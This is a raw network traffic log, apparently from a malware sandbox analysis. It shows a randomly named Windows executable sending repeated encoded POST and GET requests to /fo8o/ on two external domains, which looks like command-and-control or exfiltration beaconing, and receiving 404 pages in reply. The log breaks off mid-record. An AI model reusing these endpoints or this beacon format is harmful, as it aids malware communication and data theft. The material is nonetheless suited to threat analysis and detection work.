Jan 9, 2025 09:44:02.229307890 CET	795	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 218 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 75 50 4d 64 69 4a 55 45 51 4d 4d 61 68 34 6b 7a 47 4a 59 76 45 56 53 33 43 49 6c 33 4c 79 68 48 6c 75 51 73 59 52 78 54 6f 54 4a 58 4a 50 64 67 77 3d 3d Data Ascii: tjVTF=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIuPMdiJUEQMMah4kzGJYvEVS3CIl3LyhHluQsYRxToTJXJPdgw==
Jan 9, 2025 09:44:02.857121944 CET	637	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 08:44:02 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	61302	66.29.149.46	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:04.770037889 CET	815	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 238 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 74 70 7a 41 73 54 67 74 76 55 46 6b 71 49 68 36 6c 51 4d 66 32 6a 61 62 75 5a 32 50 69 66 38 47 63 62 4d 69 59 56 61 74 6d 59 74 41 66 45 72 30 41 3d Data Ascii: tjVTF=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVtpzAsTgtvUFkqIh6lQMf2jabuZ2Pif8GcbMiYVatmYtAfEr0A=
Jan 9, 2025 09:44:05.376526117 CET	637	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 08:44:05 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	61303	66.29.149.46	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:07.321053028 CET	1828	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1250 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 56 4d 79 76 78 4d 77 70 4e 50 66 42 6b 57 4f 67 36 39 52 57 38 71 68 53 34 37 52 2b 35 76 2f 74 56 59 78 4a 79 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 76 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 [TRUNCATED] Data Ascii: tjVTF=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1yVMyvxMwpNPfBkWOg69RW8qhS47R+5v/tVYxJy0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JVW7MvLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvpujvUuYZqEGG7eh5yUsT1M8SwhhSDkRkp1e8S11pcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyNZNQhFD3qsu2aTnzX3pf/5G3gyC993xzb1N88McQTyiy4r2BWzkLZoqkTdpzuHDPRtmGo//9keV4lDSxGV53CY7j9uiapAE6q6EEKCeKRE5aT26bYFha95iNe9ZT35M9OHmqq92UJvkC/+AeDUEY30vOFOpR65L0C2KyFHB2nXiPSOR0KiX2Cg7RtHNuRzXyUnr3K0e3zQ82TwPSQsZDQ9Db/I4GEl+zKlYkrPbJ0zFa8u3YZykGxfEX8gzGvdVJ9ciIoNtiFI3jthpewWGFtpg49LFAiMbe3VTGnTUoH6/NpdGIVW4C4HAYRuRLBS8x6LTOaUhRloJFqTrjjwNRH6Ya/l6JXFju1AG4t1M46OaaM6GTV6WyGPZviAQfN2PXZlpq4k5mLPHHDdRcYdtPlHZ/bVlYC5zvZb6i5FjkpdQIbfwYZ4YFtFfB6tZzMtctu074I7LnolpdaPU5YLwp0uPlKScZXCTxPPQEaPVLoJAv7joE4SF+XczP/tmXxtBG4WN1lh4EMjTGTxSi [TRUNCATED]
Jan 9, 2025 09:44:07.941158056 CET	637	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 08:44:07 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	61304	66.29.149.46	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:09.859900951 CET	530	OUT	GET /fo8o/?tjVTF=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5havgW/E7FBnRHSVLxLOmP4JSsfFuCtKITU5HHIETNdwZpVM5nJMc2sOIT&2na=ihrTFVnP9VKx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 9, 2025 09:44:10.468795061 CET	652	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 08:44:10 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	61305	195.110.124.133	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:15.570766926 CET	813	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 218 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 68 51 72 32 34 55 50 4f 65 4f 48 37 6d 6c 55 63 63 63 57 4f 67 54 45 6c 35 38 43 49 76 6e 2f 2f 49 50 75 4b 72 6b 64 37 76 65 52 72 49 4f 79 4d 77 3d 3d Data Ascii: tjVTF=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCihQr24UPOeOH7mlUcccWOgTEl58CIvn//IPuKrkd7veRrIOyMw==
Jan 9, 2025 09:44:16.268356085 CET	367	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 08:44:16 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	61306	195.110.124.133	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:18.108959913 CET	833	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 238 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 72 2f 68 37 59 30 66 4a 36 4b 39 4a 4c 32 48 4a 51 38 6b 59 37 37 6d 61 76 32 61 50 48 4d 78 2f 61 49 75 46 4d 6f 53 42 46 58 6e 59 56 79 52 44 45 3d Data Ascii: tjVTF=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxr/h7Y0fJ6K9JL2HJQ8kY77mav2aPHMx/aIuFMoSBFXnYVyRDE=
Jan 9, 2025 09:44:18.776196003 CET	367	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 08:44:18 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	61307	195.110.124.133	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:20.648029089 CET	1846	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1250 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 43 66 2f 6e 61 30 53 51 6f 71 57 39 59 75 4c 4b 61 73 53 35 6f 76 44 76 4d 48 39 54 71 53 68 6a 75 48 2b 76 48 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 41 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 [TRUNCATED] Data Ascii: 